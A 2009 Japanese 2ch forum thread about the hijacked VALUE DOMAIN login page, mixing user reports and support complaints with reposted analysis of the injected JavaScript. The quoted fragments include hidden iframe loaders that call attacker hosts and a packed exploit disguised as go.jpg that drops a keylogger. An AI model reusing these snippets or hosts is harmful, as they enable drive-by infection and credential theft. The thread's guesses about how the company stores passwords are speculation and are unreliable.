ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2009/07.html#20090706_DirectShow

お名前.comが移管380円のキャンペーンやってるから乗っかってみようかな

うちはccTLDなので心中するしかなさそうです/ ,' 3　 `ヽｰっ

>>692　お前はほんとに役に立たない奴だなｗ

しかしウイルス置いてあるサイトのアクセス数がすごい勢いで増えてるな

サイトジャックが済んでも、ゼロデイ攻撃のためにとりあえずそのまま放置しておくんだろうね。

闇市場でアカウント情報を売買してるって言うしな

>>704
また随分いいタイミングでのキャンペーンだなぁ。いつのまにか独自DNS使えるようになってるし。

・・・まさか・・・まさかな・・・。

>>708
ゼロデイ攻撃の意味わかってるか？

>>711
だからゼロデイ攻撃を起こすときに乗っ取ったサイトをいっぺんに書き換えるでしょ

頭の悪い会話は他所でやってくれよ
後から来た人がこの騒ぎを冗談と思ったらどうするんだ

ESETで踏み抜いてみた。
>219.101.229.188 ←やられてる

2009/07/08 21:23:11
HTTP フィルタ
ファイル http://110.165.41.103:888/dir2/go.jpg
JS/Exploit.CVE-2008-0015.A.Gen トロイの木馬 接続が切断されました - 隔離しました
XXXXXXX\xxxx
アプリケーションによるウェブへのアクセスにおいて脅威が検出
されました: C:\Program Files\Internet Explorer\iexplore.exe.

ごめん
全角にしていなかった orz

>>714
ってことは画像ファイルに偽装してるってことです？
Javascript/FLASHきってても危ないのです？

うちVDでドメインを20個以上管理委託してるんですが…
今回の件の公式アナウンスがほしい

どいつもこいつも感染自慢するのはいいがurlには気を使ってくれよ
そんなに感染者増やしたいのか？

これか、
○アクセス解析用のサーバー
ax2(219.101.229.188)　Xeon 2.40 GHz×2 2GB DELL PowerEdge 2650

レンタルアクセス解析サービス　謎のあやしい文字　＆　う　・・・
いまは、でない。気のせいだったのか・・・　気のせいだったんだろうなぁ
でも、どこででたんだろう・・・　いまいち記憶が・・・

>>716
【アクセス解析】AccessAnalyzer.com Part5【XREA】
http://pc11.2ch.net/test/read.cgi/hp/1234096306/

ここの562以降から詳しく解説されてるよ

>>464

> お問い合わせについてですが、弊社にてサポート業務などにおいて数分単位でログインページは常時確認しております
> が、ユーザー様よりご連絡いただいている「改竄」は確認できませんでした。
>
> ご確認の上、適宜ご作業いただければ幸いです。

↑はマジか？

マジだとしたら、とことんダメだなこの会社、
隠蔽体質にもほどがあるな
なぜ「改竄があったが修正した」と言えん
実際埋め込まれているソースは確認したし、保存してるで
事実を話そうや

CORESERVERのスレでも、異変がおきてるっぽくない?

>>714
おま
Live2chが勝手に画像表示しようとしてカスペが反応したぞｗ

Exploit.JS.DirektShow.b

>>720
じゃあお前がその持ってる証拠を突きつけて戦ってくれ。
現象を見てない俺の通報じゃこう言われたら引き下がるしかない。

改竄を確認できて無いだけで安全を確認できてるわけじゃないんだよな

正直ここ2週間くらいアカ消されたとか言う奴が粘着荒らししまくってたから何も信用できん

>>721
管理が同じだからな

俺が報告したらこういう返事がきたよ

[2009-07-08 19:27:43] サポートからメッセージが追加されました。

ご連絡、確認させていただきました。

いただきました件につきましては、カスタマーサポート(受付部門)では対応できませんため、担当部門に申し送りさせていただきますが、現在は、私どもカスタマーサポート(受付部門)に対して、
　●弊社・担当部門からの報告が入っていない
という状況です。

そのため、本件につきましては、真偽確認の上、そのような状況にございました場合は、担当部門判断においてご案内させていただきます。
但し、あくまでも、私どもは申し送りを行なうところまでの対応になりますことから、
　●実際に障害が発生していた場合　→　障害ページなどでの一括連絡
　●事実確認できない場合　→　連絡は行なわない
という形のご対応になる場合もございますことを、あらかじめご了承いただきますようお願い申し上げます。

>>726
ごめん、書き方が悪かった…

こんな風に書かれてたよ↓

SSLサーバ(ss1.coressl.jp)が死んでる？
SSL無効 or ss1.xrea.com経由ならつながる

管理側で確認が出来ないのは、
公式のWeb鯖かDNS鯖が乗っ取られてて
管理側からのアクセスは正常に見えるよう偽装してるんじゃないだろうか？

それは関係ないｗ

>>727 この担当部門ってほんとに存在してるのかなぁ？
なんかcore、vd使ってたらこの担当部署って外注なきがするｗ

>>723
デジロの隠蔽は許されない！
今キタ人の為に、とりあえず事実をまとめようか

【必読Noまとめ】

>>29
>>31
>>32
login.phpに埋め込まれていた具体的なJavaScriptは↑で間違いない

>>92
この魚拓も俺が保存しているものと一致する（JavaScriptをOFFにして開けること）

>>93
>>95
埋め込まれていたmalware（キーロガー）を実行した勇者がいた（スクリーンショットあり）

>>286
こちらにもlogin.phpが改竄されてmalwareが埋め込まれていた履歴が残っている

>>34
埋め込まれていたJavaScriptを置いている香港サーバーの結果は↑のとおり

>>727
これ要するに「担当部門が大混乱中で返事が返ってこないからわからん」って言ってるよな

>>731
外注というか、在宅のバイトじゃなかったっけ

●弊社・担当部門からの（日本語による）報告が入っていない

こんな規模の会社で受付部門も担当部門も明確な区分けなんて
あるとは思えないのだが

>>733いまでもなんとか技術うけおってくれてる、元社員にしぶしぶ連絡すっかーなー
でも保守料高くつんだよ。おれがちょちょいってなおしてみるから
おめーらはｶﾞﾀｶﾞﾀ騒がずまってろ、こんなもん文系の俺でもなおせるわｗｗ

と訳した

>>97
がキーロガーのスクリーンショットな

誰かWikiつくって

>>727
俺の時の回答と同じだよ。2営業日経っても同じ回答とか。。。

もーいいや
既に移管承認メールで承認ポチッたし、あともう少しで糞VDとは縁が切れる

担当部門が報告無く勝手に対処（隠蔽）しているかもしれないが、
受付部門では分からないとでも言って、言い逃れするつもりなのだろうか

PHPの改竄前に、全ドメインの顧客情報が漏れいたのではないか？
という疑いを捨てきれない。（PHPを改竄できる権限があるならDBも見ることができた可能性を考慮）

ユーザーがすぐに気がつくJavaScriptでキーロガーを埋め込んだ理由は、
ハッキング済みだという犯行声明のようなものだったのではなかろうか？
ユーザーが他のサイトで使うIDやPASSをも狙ったキーロガーだったのかもしれないが、すぐに見つかるJavaScriptを使用する手口といい、PHPを改竄する権限がありながらわざわざやることでもないと思った次第。

もうだめぽ

アクアナの方は現在進行形なんだよね？

ヌー速の方でもスレ立ってるみたいだが

【Geno再来？】某有名レンタルサーバがやられた【新手法】
http://tsushima.2ch.net/test/read.cgi/news/1247061049/

>>744
進行形。まだ不正コードが存在。

あと、今見るとトップページにも同じ不正コードがあるんだが、さっきからあったっけ？

219.101.229.188/

ログインフォームのと同じく、188のみに存在。189にはなし。

捏造ネタで煽ってる人はそろそろ次のネタ考えないとタイムリーさに欠けちゃうよねｗ

>>748
社員乙

>>749
原点回帰かよｗｗ

>>749
ああスマン

こんな事実はなく全部捏造だってネタレスで煽ってる人はそろそろ次のネタ考えないとタイムリーさに欠けちゃうよねｗ

>>748
さっさと対策とれよ

>>742
のような、デジロに都合の悪い書き込みがあると、
捏造ネタだと言って流そうとするタイムリーな人が現れるのです

>>747
>>633ですでに報告済み


とはいえ、あいかわらずかわらないようだね
> wget -qO- http://219.101.229.189/ | md5; echo
9a351be22ecc97745590f280a4f29cce

> wget -qO- http://219.101.229.188/ | md5 ; echo
a8ad424c1d68b71feb0797e415ba0a86

タイムリーくん
絶対無理ー

>>754
自分が気づいてなかっただけか、thanks

VALUE DOMAIN のログインページ改ざん　スラッシュドット・ジャパン
http://slashdot.jp/security/article.pl?sid=09/07/08/0432248

自分のドメイン2個はwhoisで見る限りは不審な点は無し
すぐにでも逃げ出したいが、今ログインすると危ないと…
どうすりゃいいんだろう

Vista+Firefoxなのでクライアントは大丈夫だが、VD側にある情報は手の打ちようがないな

スレ加速してて驚いた。いやはや大変なことだな。

非常時あげ

あがってねーや

219.101.229.188/をgoogle chromeやFirefoxで開くと
「このサイトにアクセスするとコンピュータに損害を与える可能性があります。」
とブロックしますね、一応Port888を含む怪しいポートはFWで閉じての確認です

ｔｔｐ：//1856317799:888/jp.js　←Firefoxで見るとこのアドレスのjsに接続するようだが末尾のjpがなんだか嫌だな

568 名前：Name_Not_Found[sage] 投稿日：2009/07/08(水) 19:13:30 ID:???
じわじわと何やられてんのかなーと調べ中。どうみてもあやしいｊｐ．ｊｓの中身を見てみる
>>563もそうだけど、大丈夫かは明確じゃないんでwindowsでは調べるのやらないほうがいいと思います。
とりあえず俺はFreeBSDなんでそれでやってます

>more jp.js
/*dsadasdadasdasdasdas*/
if(document.cookie.indexOf("J=")==-1)
{var js = document.createElement('iframe');
js.src ="ｈｔｔｐ：￥／￥／０ｘ６ＥＡ５２９６７：８８８／dir2/show.ｐｈｐ";
width=0;　height=0;
try {document.getElementsByTagName('head')[0].appendChild(js);}
以下略

なんか差し込まれてるね
とはいえ、show.phpはさすがに何も吐いてこない、うーむ。さらに後ろを見てみる

var fr = document.createElement('iframe');
fr.src ="ｈｔｔｐ：￥／￥／１８５６３１７７９９:888\/counter.ｈｔｍ";
width=0;
height=0;
try {document.getElementsByTagName('head')[0].appendChild(fr);}

なんか呼ばれてるcounter.htmをみてみる
<!-- shinobi ct2 -->
<script type="text/javascript" src="ｈｔｔｐ://ct2.shinobi.jp/sc/１２９８８７７"></script>
<noscript><a href="http://ct2.shinobi.jp/gg/1298877" target="_blank"><img src="http://ct2.shinobi.jp/ll/１２９８８７７"
border="0" alt="<A5><AB><A5><A6><A5><F3><A5><BF><A9>`"></a></noscript>
<!-- /shinobi ct2 -->

ん？　忍者ツールだと……。
もうちょっと調べてみるかな。なにやってんだろうね

574 名前：Name_Not_Found[sage] 投稿日：2009/07/08(水) 19:32:26 ID:???
いろいろしらべていくと、あぁなるほど

で、
<script src='go.jpg'></script>
で、問題のｊｐｇをスクリプトとして読み込ませてますね

他の関係なさそうなファイル見てみると
if(user.indexOf("msie 6")==-1&user.indexOf("msie 7")==-1)
ともあるので、
これも同じように、IE6とIE7の狙い撃ちかな？　わざわざ律儀ですね

でも、whoisとかで調べていくと、
hellh.netということで、
おそらく、本体は、各種ネトゲのアカウントハックってところでしょうかね
ネトゲやってないと問題ない、なんて思っても、
この手のウイルスはレジストラに残るとネットワーク重くしたりといろいろうざいんで、
対応したほうがいいですね

とりあえず俺は大体わかったんで、ここまで

563 名前：Name_Not_Found[sage] 投稿日：2009/07/08(水) 18:31:04 ID:???
改ざん？されたらしいほうのところを調査

gifトロイやらなんやら一杯はいってるね。自己解凍cabが偽装されてたりするし
でも大体は最新にアップデートしてればおｋかな

でも、一番の問題は、これかな
http:／／１８５６３１７７９９：８８８／ｄｉｒ２／ｇｏ．ｊｐｇ

一見拡張子からjpgファイルっぽいけど、
> more go.jpg
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e
以下長いので略

まぁ、スクリプトが偽装してある、これがまだ回避策のみでパッチがででてない虚弱性
972890
http://www.microsoft.com/japan/technet/security/advisory/972890.mspx
なのかな

>>765
「虚弱性」で台無しだな

え？　突っ込みどころはそこ？

全部捏造かもしれん

デジロは永遠です

臀部劣情かもしれん

さっさと対応しろよ
糞社員

糞社員と申されましても、対応できないものはできません。

・ドメインの個人情報が全て漏れているのでは？
とか、
・ウイルスの存在
とか、
都合が悪い書き込みを流すことが役目なのです

え？ それも外注だよね？

俺もgo.jpgだけ喰らったぽいんだけど、
ウイルススキャン3社ので、全スキャンしたけど何もでない・・・でも不安すぎる

もちろんです

.netと.nuと.jpを別の所に移管したいのだがいい所ない？

>>774
go.jpgはウイルス本体じゃないそうです

582 名前：Name_Not_Found[sage] 投稿日：2009/07/08(水) 19:46:58 ID:???
調査ついでに、FreeBSDからWindowsに移って各種ウイルスソフトの対応状況も確認してみたよ
とりあえず試験用に５台あるので、そっちでチェック

ノートン、カスペルスキー、avast、nod32はgo.jpgに反応した。なかなか優秀ですね
ウイルスバスターは反応なし。残念ですね


でも、このｊｐｇ自体が本体ではなく、それを利用してくる、別のウイルス本体のexeがあるので、
そっちに反応してればおｋですね。これは未確認だけども

624 名前：Name_Not_Found[sage] 投稿日：2009/07/08(水) 22:30:16 ID:???
バスターで反応
ウイルスが見つかりました。
隔離不能、手動での処理が必要です。
JS_DLOADER.BD

vistaでIE8なんだけどほっといても大丈夫なの？

>>777
それなら踏んだ時に、a.exe てのに反応してたから大丈夫かな。
ありがとです

自分のコメント加えるなら引用部分には引用符か段落つけてよ

>>778
a.exeが本体のキーロガーだそうです。>>93 >>95 >>97で検証されてます

598 名前：Name_Not_Found[sage] 投稿日：2009/07/08(水) 20:02:29 ID:???
暇なので、さらにチェク
無防備なWinXPを生けにえにささげ、exeをげと
んー、やっぱ普通にキーロガーですね。でもどこまで反応するかなー。特定アプリ（ネトゲ）にのみのターゲットかも
ネトゲまではいれてないしなー

とりあえず、本体までくるとどのセキュリティソフトでもＮＧっていってくるんで、
なにかセキュリティソフト入ってれば大丈夫でしょう。とりあえずはね

まさに現在進行形なので、こっちのスレの情報もチェックしといた方が良いのでは

【アクセス解析】AccessAnalyzer.com Part5【XREA】
http://pc11.2ch.net/test/read.cgi/hp/1234096306/

結局のところコレ食わされてるかどうかはどこ見て判断すればええのん？

お名前.comに移管するなら、激安キャンペーンは明日の18時まで。

GMOもちょっとなあ・・・

700 ：名無しさん＠お腹いっぱい。 ：2009/07/08(水) 20:10:18 0
>>690
まず次のところを見る：
http://www.domainname.ne.jp/

リンククラブは除外するのが無難：
http://www24.atwiki.jp/linkclub/

あとは696の紹介されたスレッドで聞くのが適当だと思う：

お前らお勧めのレジストラ教えてください
http://pc11.2ch.net/test/read.cgi/hosting/1010742997/l50

お金に困ってるなら悩んでも仕方ないね。
設定内容的にはさくらで問題ないし、VD比で倍額になるとはいえ安心を金で買うと思えば。

ドメイン種別にもよるんだけれどね。マイナーなもの掴むと後で困るよな。

信頼度
GMO＞＝さくら＞＞＞＞ロリポ＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞VD

好感度
さくら＞＞＞ロリポ＞GMO＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞VD

>>786
> 安心を金で買う

笑うところ?

>>789
もしかして悔しがってる？

ログインしたらaviraが反応したのでビビッた。
go[1].jpgは遮断してくれたが何か不安だな・・・。

VDより更新料が高いところに移管するなら前もって有効期間を増やしておいたほうが節約になる?

社名を挙げての移管先話は>>785記載のスレでやってね

>>792
うん、いっぱいいっぱいまで増やしちゃだめかもしれんけれどね

>>792
更新直後は移管できないんじゃなかったっけ。
うろ覚えｽﾏｿ

ccTLDの自分には心中せないかんみたいだ…。
タイミングよくムームーにいけりゃいいんだが。

VALUEDOMAINやWIKIWIKI.jpに仕掛けられたスクリプトから呼ばれる
msvidctl.dllスクリプトやswfやpdfがダウンロードし実行するexe。
ttp://www.virustotal.com/jp/analisis/59c9a0345aae2ee10a0d82fdbae5e87daf12568dfb6e41337283cf08eae63a51-1247059084
× ソースネクスト NOD32

>>792
延長手続き後45日間経たずにレジストラを移管すると延長した手続きが無効になる

js自体は消えたか消されたかしたみたいだけど、一時的にでもVDのFTPなりのパスワードが漏れたのは間違いないみたいだし
このままじゃ怖くてログインできないなあ
今はまだ待てるけど、これから数日なんのアナウンスもなくだんまり決め込まれたら参るなあ
つーか永遠にアナウンスなかったらどうすりゃいいんだよ

大体パスワードなんて誰でも抜かれる可能性があるんだよね
どこのサーバーでもさ
やっぱり日本語パスワードを普及させるべきさね

通例から考えると意地でも公式アナウンスはしないんだろうけど、今回はさすがにそれは無理かもね

>>792
あと、更新しすぎに注意。
有効期限が9年以上先になると移管できなくなる

さらに、移管先でトラブって再度移管したいなんて事態が起きたときの為に
9年ギリギリではなく、5〜6年くらいの更新にしておいた方が無難かな？

以下はムームードメインより
>４．ドメインの残り有効期間が９年以上あるドメインは移管できません
>移管を行うと、現在のドメイン有効期間に１年が追加されます。
>残りの有効期間が９年以上 ある場合、最大契約期間を超えてしまう為、移管が行えません。

keysysは知らないけど
eNomの再販業者なら延長手続きしても無効にならないかもしれないな

そう連発で移管はしないだろうからってメインのには8年分つっこんだっけなあ

自分も心中コースだ…ムームーでも取り扱ってない…

何ドメイン？

>>806
.chです

.tkだよ、泣いていいか？

普通にgTLDで良かったよ

805は自分だが、.tkです　>>808一緒に泣こう

なんでそんな移管したいの？
よーわからん。

それちょっと無理があるだろ

>>796です

>>807 >>808 共に心中しようか…orz

ちなみに自分はco.ukとorg.ukです。
イギリス好きがここになって仇となるとは…。

.tvにしといてよかった
でも国内業者だと扱っているところが少なくて限られてしまう

>>813
>>810さんも仲間にいれてあげてー！

国内でもマイナーccTLD扱ってるところは幾つかあるけど
移管に対応してるかが問題だな

この流れはアレか
鯖の負荷を減らすための捨て身の移管促進策か

こりゃいかん　　　　　　　　　　　　　　　あ

ガチでVDで管理してるドメインが不安なんだが
移管まんどくせだし、VDまじで頑張ってくれ！
つか公式アナウンスを早くだして
まず事態の進捗状況と今後の対策をリリースしてくれ！
これ企業としての基本だからな。

なんか、一気に移管モードONになっているやしが多いな。
まぁ焦るなよ。

ポイント消化しないといけないし暫くは残るよ

おれもco.ukだ...orz

社員は焦ろや

PHPの改竄前に、全ドメインの顧客情報が漏れていたのではないか？
という疑いを捨てきれない。（PHPを改竄できる権限があるならDBも見ることができた可能性を考慮）

ユーザーがすぐに気がつくJavaScriptでキーロガーを埋め込んだ理由は、
ハッキング済みだという犯行声明のようなものだったのではなかろうか？
ユーザーが他のサイトで使うIDやPASSをも狙ったキーロガーだったのかもしれないが、すぐに見つかるJavaScriptを使用する手口といい、PHPを改竄する権限がありながらわざわざやることでもないと思った次第。

昨日ログインパスワードの変更をしたが、
12桁までしか入力できない。
ここは20桁くらいは許可しろよ＞デジロック
まぁ、気休めだとは思うんだけどな。

100桁入力できようが意味ねーよ
POSTデータ全部見ようと思えば見えるんだし
つかこの状況で変えたこと自体が自殺行為の可能性あり

>>824
仮に、PHPを編集できる権限、つまりrootか、apacheファイルを
編集できる権限を使ったとします。
そして、データベースの接続先、IDとパスを抜き取った。
↓
データベースを操作して、顧客データを抜く

ここからが問題。
パスワードを変えたユーザはとりあえず、犯人がDNSやネームの設定を変えることはできない。

ただし、デジロックが馬鹿でデータベース接続先、ID、パスを変更していない。
↓
また抜かれる。

このパターンだと防御の策が無い。
デジロックは、真実を告知し、サーバーログの検証結果を明らかにすることだな。

>>824
現状で可能性を言っても仕方がないが

PHPを書き換えるにはスクリプトかサーバソフトの脆弱性をついてプロセスを乗っ取ればできる
DBを見たり書いたりする権限はまったく別、スクリプトに記述されたパスなんか盗みみれば可能だが
どのファイルに記述されてるかわからないとできない

FTPパスが漏れていて書き換えられた場合も同様にFTPにアクセスできてもDBにはアクセスできない
後は上と一緒

個人情報が漏れるとしたらrootやかなり大きな権限が乗っ取られた場合と内部に犯人がいる場合

普通ＤＢにパスとか突っ込むときってハッシュで書き込むよな？
まさかＤＢにそのままパスワード突っ込むわけねぇだろ

FTPパスが漏れていた場合、DBにアクセスするphpなりを自作し、そのphpを経由すれば簡単にアクセスできると思います。

>スクリプトに記述されたパスなんか盗みみれば可能だが
>どのファイルに記述されてるかわからないとできない
これについても、FTPパスがあれば、phpファイルを全取得して解析すれば、すぐに判明すると思いますよ。

>>828

＞PHPを書き換えるにはスクリプトかサーバソフトの脆弱性をついてプロセスを乗っ取ればできる
この説明がわからないのだが？具体的に

＞FTPパスが漏れていて書き換えられた場合も同様にFTPにアクセスできてもDBにはアクセスできない
これだとスクリプトを落とせますよね？ソースを検索すればすぐにデータベースへの接続情報が探せると
思うんですが？
VDは、妙にユーザービリティが高く、パスワードの中身表示なんてご丁寧な機能がある
↓
可逆できるBlowfishなどの暗号化技術を使ってるのと思われる。
まさか、生で格納していたとかの失態を犯していなければ。
ただし、Blowfishでも暗号化キーがFTPで抜かれれば、全く意味ないです。

>>830
まぁね、でもそれ（個人情報を盗む事）が目的だったらPHPを書き換えてわざわざバレるような事するかな

>>829
ハッシュのことをわかっていない愚か者は意見を書くな。
ハッシュは一歩的な暗号化で復元できません。

ハッシュを使っているか使っていないかはphpファイルを解析する必要がありますが、
ハッシュ関数がバレて複合化できる可能性もあります。

>>831

XSS 脆弱性　でググればたくさんでてくるよ

>>835
XSSは知っています。
＞プロセスを乗っ取れば
がさっぱりわかりませんが？
apacheのプロセスの乗っ取ってしまうのですか？

>>834
PHPにいけるハッシュ関数はそんなにたくさんありませんし、
ハッシュの復号化はｓ、スタートレックのボーグの暗号化を解くのみたいに
簡単にはできないと思いますが。

> でもそれ（個人情報を盗む事）が目的だったらPHPを書き換えてわざわざバレるような事するかな

なぜ既に盗み終わったぜheheheだと考えないのか。。

> PHPにいけるハッシュ関数はそんなにたくさんありませんし

自前でロジック書けばorコピペすればなんでも使えるだろハゲ

>>833
MD5の復号化について、おもしろい記事があるので紹介します。
http://en.yummy.stripper.jp/?eid=719489

「復号できない」というのは「復号するアルゴリズムがない」というだけの話で、視点を変えれば復号できないことはないのだ。

・・・と続きます。ちょっと難しいですけどね。

>>836
権限を奪って何かを実行しようとすればプロセスが生じるでしょう？

>>839
デジロックに数学学者っていましたっけ？
とりあえず、肌が白い人種以外で新しいハッシュアルゴリズム組むなんて
壮大な社員がいるのでしょうか？デブ

>842
> コピペすれば

>>831
>VDは、妙にユーザービリティが高く、パスワードの中身表示なんてご丁寧な機能がある
とのことですので、パスワードを複合化することも簡単にできそうですね。

>>841
PHPのことを良く知りもせずに書くのはやめようね。
system()関数やexec()関数を実行してプロセスを起こすと言いたいのでしょうか？
OSコマンドインジェクションのことなのかな？

>>844
だから、PEARライブラリのBlowfishを使っていると言っているのですよ。
PHPにおける復号化できる暗号化

>>845
俺が言いたかったのはPHPのファイルを書き換えるのに　DBを読む権限までは必要ないということですよ
あんま瑣末なことに噛み付かれても困るんですけど

可能性とか想像ってのは無限大なんだな。
基準も人それぞれ違うから人に押し付ける必要はないんだよ。
自信が無いから押し付けたくなるんだよな、きっと。笑って見守ろっと。

寝ないで頑張るほどのことなのか
おやすみ

tkは知らないけどco.uk、org.ukなら
国内でも移管に対応してる業者はある

>>833 あれ？なんか俺変なこと書いたか？
ハッシュをＤＢにつっこむ→ＤＢみれても普通はパス割れすることは稀
と書きたかったのだが。
あと「一歩的な暗号化」ってなにかおしえてくれ。意味がわからん

>>847
一般論ですが、XSSとは、例えば掲示板で危険なJSをリンク先に設定したリンクを
投稿したりして、他の閲覧者を危険に陥れる行為と指します。
今回のlogin.phpを改ざんするのはXSSとは言えない永続的な改ざんですね。
PHPファイルそのものを書き換えてしまうようなケースは他のアプリの脆弱性が農耕じゃないですか？

>>852
濃厚とか可能性を言ってもしょうがないけどって最初に断ってるでしょ
XSSにはスクリプトやサーバソフト脆弱性をついたものもありますよ
裁判じゃないんだからそんなに厳密な話をしたいなら勝手にどうぞ

>>851
ハッシュは、例えばPHPにおける代表的なMD5ってのは、
パスワードを謎の文字列にハッシュ化します。

しかし、それを復元して、もとのパスワードに戻すことは
できないという意味です（壮大な復元化作業は非効率で現実的でない）

ハッシュ化された文字列はデジロックの人間でさえ、元のパスワードを
知ることはできない。

よって、パスワード再発行は、新しいパスワードの上書きによって成り立ちます。

想像と不安
・VDアカウントのパスワードはさすがに暗号化してDB保存されてるだろう
・しかしDBにアクセスするID,PW等はPHPファイルに生書きじゃないか？
・login.phpに書き込める権限があるなら、中身見る権限もありそう
・XREAのFTPアカウントやPWは利便性重視でDBに生書きじゃないか？

アプリの脆弱性
より
FTPパスなりが漏れた
では？

>>854 んなこたわかって書いてるつもりだがなにか俺の書き込みに問題あったか？

>846
> PHPにおける復号化できる暗号化
だから、なぜ Blowfish だと言い切れる？
一番簡単に使えるからといって、採用しているとは限らない。
可逆アルゴリズムはいくらでもあるわけで。

>851
だぶん「一方的」って書きたかったんだと思うよ。
俺も、しばらくわからなかったけど。

>>850
まじですか。ぐぐってみます。
高くない事を祈るのみ…。

>>855
>・VDアカウントのパスワードはさすがに暗号化してDB保存されてるだろう
これについては、答えが出ている

>>831
によると、たとえ暗号化されていても、パスワードは簡単にゲットできそうですよ

>>858 「一方的」かｗ了解ｗ




んなこたわかってるよｗなんで分かってないから黙ってろなんて言われなきゃならんのかｗｗ

>>858
ベイビーよく読んでくれよ

＞Blowfishなど

「など」

まず、現時点でphpは盗聴・改竄されていると思われる。
よって、パスワードのリマインダが存在するのならば、それも同様に盗聴・改竄可能な状態だと思われる。
そして、phpから読み書きできる範囲のDBも全て盗聴・改竄されていると思われる。

結論。
どんな方法使っていようが、プログラムの実行権限奪われた時点で詰み。
ワーストケースなら全ての情報は抜かれている。

自分のアカウントを使って、
OSインジェクションや、SQLインジェクション、NULLバイト攻撃なんて試す馬鹿はいないと思うので、
脆弱性だらけかも？は否定できないな。今後も試す予定ないけどなｗ

>>863
同意見です。
デジロがどこまで正直に情報公開するかが問題です。

パスワードを混同してる奴がいる。
VDにログインするパスワード→複合化して画面に表示する機能ナシ
VDログイン後、XREAの管理画面内のFTPパスワード等→画面に表示する機能有り

どっちにしても863に同意

>>862

＞846 ： 名無しさん＠お腹いっぱい。 [sage] DATE:2009/07/09(木) 02:55:01 0
＞>>844
＞だから、PEARライブラリのBlowfishを使っていると言っているのですよ。
＞PHPにおける復号化できる暗号化。

えっ？
「など」はどこにあるの？

それと、誰かnamedに詳しい奴が、
namedの改善指示書を送ってくれんかな。
chroot入れてるか？とかね。

>>855
>・VDアカウントのパスワードはさすがに暗号化してDB保存されてるだろう

ttps://www.value-domain.com/modprof.php
「現パスワードの確認」

どう見ても生保存です本当にありがとうございました

終わた

>>869
マジですか！
この騒動でログインしておりませんでした。
本当にありがとうございました

さっきから復号の話をしてるっつーのに
表示するときに元に戻してる可能性は全否定ですかそうですか

この非常事態を知らないVDユーザー大勢いるだろうな。

デジロックが運営しているのは
そこらのショッピングサイトとはワケが違う。

ドメインサービスとかレンタルサーバを運営しているようなとこが
今回の件についてまだ何のアナウンスもないってだけで
不信感つのりまくりだわ。

もしアナウンスや対策などせずこのままだんまりだったら、
ccTLD使ってようがなんだろうが他に移る。

>>869 Cookieけしてみな

>>872
869が復号化の画面を案内したでしょ？
VDのパスワードは100％復号化できますよってこと。

>>872
＞表示するときに元に戻してる可能性は

そんなもんPHPソース見れたらバレバレだろ。生保存と同列。

クッキーに保存してんのかよ。
だったらハッシュの可能性も捨てきれない

ああ、いやパスワードをメールで送るってことは復号化できるってことか
楽観論でいけるかとおもってたけどやばいな。パス生保存されてる可能性があるなら
全員抜かれる可能性は否定できないや。

しかしメアド抜かれた時点で、パスの再発行できるわけで、
いずれにしても何でもできｒわな。
クレカだけだな。これだけは抜かれていない。毎回入力だからな。
変なもの仕込まれてたら、抜けあかもしれんが。

そうそう、login.phpでSSL通信できるみたいだから、少しは抵抗してみるとか？

ことセキュリティ問題に関しては楽観論は危険だろ

本当にありがとうございました

ｵﾜﾀな状況は変わらないって事ですね。わかります。

それに関しては当分変わらんよ

漏洩事件の多くは社内犯行だからな。合掌です。

>>881 ページ書き換え程度で無用心な閲覧者にｷｰﾛｶﾞかます
のが目的ならまだ楽観してもいいんではないか？

これ仕込んだ奴の目的が鯖の情報抜く事だったら楽観もしてられない。
なんにせよXREAはある程度サービス止めてでも速対応しないといけない。
しなけりゃ倒産が待ってる。

アナウンスする気ないんかなぁ…

そもそも、
魚拓の信頼性は？から
なんで、書き換えられたのが「事実」に変わったんだっけ？

>>886

PHPの改竄前に、全ドメインの顧客情報が漏れていたのではないか？
という疑いを捨てきれない。（PHPを改竄できる権限があるならDBも見ることができた可能性を考慮）

誰かがすぐに気がつくJavaScriptでキーロガーを埋め込んだ理由は、
ハッキング済みだという犯行声明のようなものだったのではなかろうか？
ユーザーが他のサイトで使うIDやPASSをも狙ったキーロガーだったのかもしれないが、すぐに見つかるJavaScriptを使用する手口といい、PHPを改竄する権限がありながらわざわざやることでもないと思った次第。

>>889
> ハッキング済みだという犯行声明のようなものだったのではなかろうか？
深く考えすぎ。スクリプトキディなんでしょ。

このスレを見ている人はこんなスレも見ています。(ver 0.20)

　　 納得　　　【アクセス解析】AccessAnalyzer.com Part5【XREA】 [Web制作]
　　 納得　　　GENOウイルススレ　★22 [セキュリティ]
　　 納得　　　【Geno再来？】某有名レンタルサーバがやられた【新手法】 [ニュース速報]
まぁ納得　　　電話工事屋さんよ、熱く語れ！！8軒目 [通信技術]
誰だよｗ　　　女の半数がHの悩み「やりたくてたまらないのに露骨に誘えない」「彼氏の方が、私より性欲が弱い」 [ニュース速報]

>>890 おれもそんなかんじかとおもってたけど
ちょっと楽観視できなくなってきたな。
これで糞対応だったらマジ捨てる

いまのデジロはクラックしたやつのIP割り出す事すらできなさそうで不安だ

>>863
が正論

>結論。
>どんな方法使っていようが、プログラムの実行権限奪われた時点で詰み。
この言葉に集約されている。

もう何が起きようと驚かないよ。

>誰だよｗ　　　女の半数がHの悩み「やりたくてたまらないのに露骨に誘えない」「彼氏の方が、私より性欲が弱い」 [ニュース速報]
なんかワロタ

IPで犯人特定なんて時代遅れです。

さておれも移管するかな

つかまだサイトにjsファイルがあってワロタｗ
いや笑えないか、まだデジロは事態を把握してないのかね

>>889
VDのパスワード全部盗っててもそれで終わりじゃない
キーロガー仕込めば他のパスワードも盗れる可能性が出てくる
目的はVDのパスワードだけじゃないってことだろ

パスワードってそこら十で同じものつかう焼房がいるので、
ほんと宝の山では？

ほんと・・・なんでこんな信用できないところと契約してしまったんだろ・・
今までの対応がホント糞だったのに、ネームバリューだけで・・・悔やまれる

>>889
はコピペするほどの論じゃねーだろｗ

移管されたくないから対応しないんじゃ

>>895 俺もトレンドに乗りたいから教えてください

>>902
対応しないから不安で移管決めたんだが。

まさに詰み

長澤

■VALUE DOMAIN/XREA 不正改竄問題の流れまとめ■

07/06 VALUE DOMAINのログイン画面に不正なJSが挿入される改竄が発見される
　　　ログイン画面　(A) ttp://www.value-domain〆.com/login.php　は
　　　(B)　ttp://1856317799〆:888/s.js　を呼び出している
　　　(C)　ttp://110.165.41.103〆:888/dir/m.htm　を呼び出している
